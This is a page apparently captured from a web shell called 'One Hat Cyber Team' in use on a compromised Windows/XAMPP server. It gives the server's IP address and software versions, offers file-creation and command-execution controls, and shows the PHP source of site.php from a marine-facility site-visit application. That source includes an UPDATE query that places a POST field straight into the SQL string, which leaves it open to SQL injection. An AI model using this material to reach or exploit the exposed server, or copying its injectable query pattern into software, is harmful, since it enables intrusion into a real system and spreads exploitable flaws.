One Hat Cyber Team
Your IP :
172.16.0.254
Server IP :
58.26.163.33
Server :
Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Server Software :
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
PHP Version :
7.3.25
Buat File
|
Buat Folder
Eksekusi
Dir :
C:
/
xampp7
/
htdocs
/
edgpens
/
edg
/
Edit File:
site.php
<?php if(empty($page)){ include("../access.php"); } ?> <?php $modal_name = str_replace("/", "-", $page); $param_data = array(); $combx1 = ""; $combx2 = ""; $idMarineFacility = (isset($_GET['idMarineFacility'])) ? $_GET['idMarineFacility'] : '' ; $flagStatus = (isset($_GET['flagStatus'])) ? $_GET['flagStatus'] : '' ; $year = (isset($_GET['year'])) ? $_GET['year'] : '' ; // $sqlx = "SELECT * FROM utiliti_user"; // $rstx = $mysqli->query($sqlx) or die(mysqli_error($mysqli)); $user = get_user_full($_SESSION['session']); $roles = (int)$user['idRoles']; // $roles = (int)$_GET['roles']; $idUser = (int)$user['idUser']; $idPelabuhan = (int)$user['idPelabuhan']; $dgapprove = $user['flagDGApproval']; $comb1 = ""; $comb2 = "a.flagApprove,"; $comb3 = ""; if($roles !== 5){ if($roles == 1){ $comb1 = " AND a.idUserApply = '{$idUser}'"; }else if($roles == 2){ // echo $comb1 = " AND ((a.submit = 'Y' AND a.idApprove = 0) OR (IF(a.idApprove != 0, a.idApprove = {$idUser}, null))) AND a.idMarineFacility = '{$idPelabuhan}'"; $comb1 = " AND if(a.idApproveMFSO = 0 AND a.idApproveDG = 0 AND a.idApproveMTSO = 0, a.submit = 'Y', 1) AND a.idMarineFacility = '{$idPelabuhan}' AND a.idApproveMTSO = 0"; $comb3 = " AND (IF(a.idApproveMFSO != 0 AND a.idApproveDG != 0, IF((a.idApproveMFSO = 0 OR a.idApproveDG = 0) AND a.idApproveMFSO != a.idApproveDG, (IF(a.idApproveMFSO != 0, a.idApproveMFSO = {$idUser}, 1)) OR (IF(a.idApproveDG != 0, a.idApproveDG = {$idUser}, 1)), a.idApproveMFSO = {$idUser} OR a.idapproveDG = {$idUser} ) ,1)) AND IF(a.flagDG = 'T' AND a.idApproveMFSO != 0 , a.idApproveMFSO = {$idUser},1)"; // echo "<br>"; }else if($roles == 3){ $comb1 = " AND IF(a.flagDG = 'Y', a.idApproveMFSO != 0 AND a.idApproveDG != 0 AND a.flagApproveMFSO = 'Y' AND a.flagApproveDG = 'Y', a.idApproveMFSO != 0 AND a.flagApproveMFSO = 'Y') AND IF(a.idApproveMTSO != 0, a.idApproveMTSO = {$idUser},1)"; // echo $comb1 = " AND ((f.idRoles = '2' AND a.flagApprove = 'Y') OR (IF(a.idApprove != 0, a.idApprove = {$idUser}, null)))"; $comb2 = " IF(a.idApproveMTSO != {$idUser}, 'T',a.flagApprove) AS flagApprove,"; } }else{ $comb1 = ""; } if(!empty($idMarineFacility)){ $combx1 .= " AND a.idMarineFacility = ? "; $param_data['p1'] = $idMarineFacility; } if(!empty($flagStatus)){ $combx1 .= " AND a.flagStatus = ? "; $param_data['p2'] = $flagStatus; } if(!empty($year)){ $combx1 .= " AND YEAR(a.tarikhVisit) = ? "; $param_data['p3'] = $year; } $sqlx = " SELECT a.*, DATE_FORMAT(a.tarikhVisit,'%d-%m-%Y') AS tarikhVisit, b.nama AS nama_pelabuhan, c.nameUser, SUM(IF(d.idVisitDetail IS NOT NULL,1,0)) AS tot_finding, SUM(IF(d.response_date != '0000-00-00',1,0)) AS tot_response FROM visit_main a LEFT JOIN kod_marine_facility b on b.idMarineFacility = a.idMarineFacility LEFT JOIN user_list c ON c.idUser = a.enter_by LEFT JOIN visit_detail d ON d.idVisitMain = a.idVisitMain WHERE 1=1 -- AND idVisitor = '{$idUser}' {$combx1} GROUP BY a.idVisitMain ORDER BY a.tarikhVisit DESC "; $result2 = mysqli_prepare_all($sqlx,$param_type = "auto",$param_data); $rows_app = $result2->num_rows; if($_POST): if($_POST['val-type'] == 'mfso'): $ext = "MFSO"; elseif($_POST['val-type'] == 'dg'): $ext = "DG"; else: $ext = "MTSO"; endif; $sql = "UPDATE permohonan_main SET submit = IF('{$_POST['flagApprove']}' = 'T','T',submit), flagApprove{$ext} = ?, idApprove{$ext} = ?, comments{$ext} = ?, tarikhApprove{$ext} = NOW() WHERE idPermohonan = ?"; $param_type = "ssss"; $param_data = array( "flagApprove{$ext}" => $_POST['flagApprove'], "idApprove{$ext}" => $idUser, "comments{$ext}" => $_POST['comments'], "idPermohonan" => $_POST['val-id'] ); $data = mysqli_prepare_audit($sql,$param_type,$param_data); $sql = "INSERT INTO permohonan_kelulusan (idPermohonanMain, flagApprove, idApprove, tarikhApprove, type, comments) values (?,?,?,NOW(),?,?)"; $param_type = "sssss"; $param_data = array( "idPermohonanMain" => $_POST['val-id'], "flagApprove" => $_POST['flagApprove'], "idApprove" => $idUser, "type" => $_POST['val-type'], "comments" => $_POST['comments'] ); $data = mysqli_prepare_audit($sql,$param_type,$param_data); echo "<script>window.location.replace('index.php?page=edg/main');</script>"; exit(); endif; ?> <!-- Blank Header --> <div class="content-header"> <div class="row"> <div class="col-sm-6"> <div class="header-section"> <h1>SITE VISIT</h1> </div> </div> <div class="col-sm-6 hidden-xs"> <div class="header-section"> <!-- <ul class="breadcrumb breadcrumb-top"> --> <!-- <li>Extra Pages</li> --> <!-- <li><a href="">Blank</a></li> --> <!-- </ul> --> </div> </div> </div> </div> <!-- END Blank Header --> <!-- Get Started Block --> <div class="block full"> <!-- Get Started Title --> <!-- <div class="block full"> --> <!-- Block Tabs Title --> <div class="block-title"> <div class="block-options pull-right"> <div class="btn btn-effect-ripple btn-info print-me" data-toggle="tooltip" data-original-title="Print" onclick="myFunction('site_1','<?php echo $idUser;?>')"><i class="fa fa fa-print"></i></div> <div class="btn btn-effect-ripple btn-warning search-me" data-toggle="tooltip" data-original-title="Search"><i class="fa fa fa-search"></i></div> <a class="btn btn-sm btn-effect-ripple btn-default" data-toggle="tooltip" data-original-title="Refresh" href="index.php?page=<?php echo $page;?>"><i class="fa fa-refresh"></i></a> <!-- <div class="btn btn-effect-ripple btn-default reset-me" data-toggle="tooltip" data-original-title="Reset"><i class="fa fa-refresh"></i></div> --> </div> <div class="block-options pull-left"> <a href="index.php?page=edg/site&np=edg/s_main" class="btn btn-effect-ripple btn-success" data-toggle="tooltip" title="Add New Site Visit"> <i class="gi gi-folder_plus"></i> New </a> </div> <ul class="nav nav-tabs" data-toggle="tabs"> <li class="active"><a href="#block-tabs-home">Site List <span href="javascript:void(0)" class="label label-info"><?php echo $rows_app; ?></span></a></li> </ul> </div> <!-- END Block Tabs Title --> <div id="modal-search" class="modal fade" tabindex="-1" role="dialog" aria-hidden="true"> <div class="modal-dialog modal-md"> <div class="modal-content"> <form class="push form-horizontal" id="search-validation" action="index.php?page=utility/userList" method="get"> <!-- if delete. check post name delete --> <input type="hidden" name="page" value="<?php echo $page;?>"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true"><span aria-hidden="true">×</span></button> <h4 class="modal-title"><i class="fa fa fa-search"></i> <strong>SEARCH</strong></h4> </div> <div class="modal-body"><!-- modal-body --> <div class="form-group"> <label class="col-md-3 control-label" for="idMarineFacility">Marine Facility</label> <div class="col-md-7"> <?php $sqlx = "SELECT * FROM kod_marine_facility WHERE flagAktif = 'Y' AND flagPort = 'Kemaman' ORDER BY nama"; $rstx = $mysqli->query($sqlx) or die(mysqli_error($mysqli)); ?> <select class="form-control select-select2 select2_custom" data-validation="default" name="idMarineFacility" id="idMarineFacility"> <option value="">-- ALL --</option> <?php while($aa = $rstx->fetch_assoc()){ ?> <option value="<?php echo $aa['idMarineFacility']; ?>" <?php if($aa['idMarineFacility'] == $idMarineFacility){ echo "selected='selected'";} ?> ><?php echo $aa['nama']; ?></option> <?php }?> </select> </div> </div> <div class="form-group"> <label class="col-md-3 control-label" for="val-aktifL">Status</label> <div class="col-md-7"> <label class="radio-inline" for="val-aktifB"> <input type="radio" class="not_autoset" id="val-aktifB" name="flagStatus" value="OPEN" <?if($flagStatus=='OPEN'){?>checked<?}?>> OPEN </label> <label class="radio-inline" for="val-aktifT"> <input type="radio" class="not_autoset" id="val-aktifT" name="flagStatus" value="CLOSED" <?if($flagStatus=='CLOSED'){?>checked<?}?>> CLOSED </label> </div> </div> <div class="form-group"> <label class="col-md-3 control-label" for="year">Year</label> <div class="col-md-4"> <input type="number" maxlength="4" oninput="javascript: if (this.value.length > this.maxLength) this.value = this.value.slice(0, this.maxLength);" id="year" name="year" class="form-control" placeholder="Year" value="<?php echo $year;?>"> </div> </div> </div><!-- [end] modal-body --> <div class="modal-footer"> <!-- <h4 class="pull-left">$ <strong class="text-primary-dark">689</strong><small>.00</small></h4> --> <button type="submit" class="btn btn-effect-ripple btn-primary">Submit</button> <button type="reset" class="btn btn-effect-ripple btn-default btn-reset"><span class="btn-ripple animate" style="height: 61px; width: 61px; top: -15.3px; left: 11.8667px;"></span>Reset</button> <button type="button" class="btn btn-effect-ripple btn-danger" data-dismiss="modal">Close</button> </div> </form> </div> </div> </div> <div id="modal-form" class="modal fade <?php echo $modal_name;?>" tabindex="-1" role="dialog" aria-hidden="true"> <div class="modal-dialog modal-lg"> <div class="modal-content"> <!-- <form class="push form-horizontal" id="form-validation" action="index.php?page=edg/main" method="post"> --> <!-- if delete. check post name delete --> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true"><span aria-hidden="true">×</span></button> <h4 class="modal-title"><strong>SITE VISIT</strong></h4> </div> <div class="modal-body"><!-- modal-body --> <ul class="nav nav-tabs" data-toggle="tabs"> <li class="active tab-click"><a href="#site">Site Visit</a></li> <li class="tab-click"><a href="#details">Detail / Notes & Files Upload</a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="site"></div> <div class="tab-pane" id="details"></div> </div> <hr> <center> <!-- <button type="button" class="btn btn-effect-ripple btn-warning" onclick="myFunction('site_2','')">Print</button> --> <button type="button" class="btn btn-effect-ripple btn-danger" data-dismiss="modal">Close</button> </center> </div><!-- [end] modal-body --> <input type="hidden" name="type_submit" value="add"> <input type="hidden" name="val-id" value=""> <input type="hidden" name="val-type" value=""> <!-- <div class="modal-footer"> --> <!-- <h4 class="pull-left">$ <strong class="text-primary-dark">689</strong><small>.00</small></h4> --> <!-- </div> --> <!-- </form> --> </div> </div> </div> <!-- Tabs Content --> <div class="tab-content"> <div class="tab-pane active" id="block-tabs-home"> <div class="table-responsive"> <form method="post" data-modal-target="<?php echo $modal_name;?>"> <input name="type_submit" type="hidden" value="delete"> <table id="example-datatable" class="table table-striped table-bordered table-condensed table-vcenter table-hover no_add_delete"> <thead> <tr> <th class="text-center no_sorting" style="width: 40px;">NO</th> <th class="text-left" style="width: 250px;">Created By</th> <th class="text-left">Terminal Name</th> <th class="text-center" style="width: 100px;">Date</th> <th class="text-center" style="width: 100px;">Finding</th> <th class="text-center" style="width: 90px;">Response</th> <th class="text-center" style="width: 90px;">Status</th> <th class="text-center no_sorting" style="width: 80px;"><i class="fa fa-flash"></i></th> </tr> </thead> <tbody> <?php $i=1; while($aa = $result2->fetch_assoc()){ if($aa['flagStatus'] == 'OPEN') $tr_class = "text-success"; else $tr_class = "text-danger"; ?> <tr> <td class="align-top text-right"><?php echo $i++; ?>.</td> <td class="align-top text-left"><?php echo strtoupper($aa['nameUser']);?></td> <td class="align-top text-left"><?php echo strtoupper($aa['nama_pelabuhan']);?></td> <td class="align-top text-center"><?php echo $aa['tarikhVisit']?></td> <td class="align-top text-center"><?php if(empty($aa['tot_finding'])) echo "-"; else echo $aa['tot_finding']; ?></td> <td class="align-top text-center"><?php if(empty($aa['tot_response'])) echo "-"; else echo $aa['tot_response']; ?></td> <td class="align-top text-center <?php echo $tr_class;?>"><b><?php echo $aa['flagStatus']?></b></td> <td class="align-top text-center"> <div class="btn btn-effect-ripple btn-warning btn-xs print-me" data-toggle="tooltip" data-original-title="Print" onclick="myFunction('site_2','<?php echo $aa['idVisitMain'];?>')"><i class="fa fa fa-print"></i></div> <a href="javascript:void(0)" title="Details" class="btn btn-effect-ripple btn-xs btn-info edit-me" data-modal-target="<?php echo $modal_name;?>" data-myid="<?php echo $aa['idVisitMain'];?>" data-type="mtso"><i class="fa fa-book"></i></a> <a title="Edit Record" class="btn btn-effect-ripple btn-xs btn-success" href="index.php?page=edg/site&np=edg/s_main&ii=<?php echo $aa['idVisitMain']?>"><i class="fa fa-pencil"></i></a> <?php if($aa['idVisitor']==$idUser){ ?> <a href="javascript:void(0)" title="Delete Record" class="btn btn-effect-ripple btn-xs btn-danger del-me" data-val="<?php echo $i;?>"><i class="fa fa-times"></i></a> <?php }else{ ?> <a href="javascript:void(0)" title="Delete Record" class="btn btn-effect-ripple btn-xs btn-danger disabled" data-val="<?php echo $i;?>"><i class="fa fa-times"></i></a> <?php } ?> </td> </tr> <?php } ?> </tbody> </table> </form> </div> </div> </div> <!-- END Tabs Content --> <!-- </div> --> <script src="js/pages/formsValidation.js"></script> <script type="text/javascript"> function myFunction(xx,yy) { var $frm = $('<form action="reports/print_report.php" method="post" target="_blank"></form>').appendTo('body'); $($("#search-validation").html()).appendTo($frm); $('<input type="text" name="type" value="'+xx+'">').appendTo($frm); $('<input type="text" name="idu" value="'+yy+'">').appendTo($frm); if($frm.html() !== ''){ $frm.find(".btn-primary").trigger("click"); $frm.remove(); } }; $(document).ready(function(){ $("#example-datatable").setdatatable('{ "autoWidth": false }').setadddelete(); $("#example-datatable2").setdatatable('{ "autoWidth": false }').setadddelete(); $('thead input:checkbox').click(function() { var checkedStatus = $(this).prop('checked'); var table = $(this).closest('table'); $('tbody input:checkbox', table).each(function() { $(this).prop('checked', checkedStatus); }); }); $(document).on("click", ".add-me", function(){ var modal_name = "."+$(this).closest("form").data("modal-target"); $(modal_name).modal({keyboard:true}); $(modal_name).find("input").not(":button, :submit, :reset").val("").prop("checked",false); $(modal_name).find("select").prop("selected",false); $(modal_name).find('.help-block').remove(); $(modal_name).find('.form-group').removeClass('has-success has-error'); $("#form-validation").setvalidation(''); $("#form-validation > [name='type_submit']").val("add"); // console.log($._data($("#form-validation").get(0), "events")); }); $("#example-datatable tbody").on("click", ".del-me", function(){ if(confirm("Delete This Record! Are You Sure?")){ $(this).closest("table").find("input[type='checkbox']").prop("checked",false); $(this).closest("tr").find("input[type='checkbox']").trigger("click"); $(this).closest("form").submit(); } }) $("#example-datatable tbody").on("click", ".edit-me", function(){ // console.log(1); var modal_name = "."+$(this).data("modal-target"); var myid = $(this).data("myid"); var type = $(this).data("type"); var getthis = 0; $.ajax({url: "edg/s_info.php?ii="+myid+"&target=site", success: function(result){ $(modal_name).find(".tab-pane[id=site]").html(result); }}).done(function(){ $(document).trigger("resize"); }); $.ajax({url: "edg/s_info.php?ii="+myid+"&target=details", success: function(result){ $(modal_name).find(".tab-pane[id=details]").html(result); }}).done(function(){ $(document).trigger("resize"); }); $(modal_name).modal({keyboard:true}); $(modal_name).find("input").not(":button, :submit, :reset").val("").prop("checked",false); $(modal_name).find("select").prop("selected",false); $(modal_name).find('.help-block').remove(); $(modal_name).find('.form-group').removeClass('has-success has-error'); // $("#form-validation").setvalidation(editdata); $("#form-validation > [name='type_submit']").val("edit"); $("#form-validation > [name='val-id']").val(myid); $("#form-validation > [name='val-type']").val(type); }); $(".tab-click").on("click",function(){ $(document).trigger("resize"); }) }); </script> </div> <!-- End Started Block -->
Simpan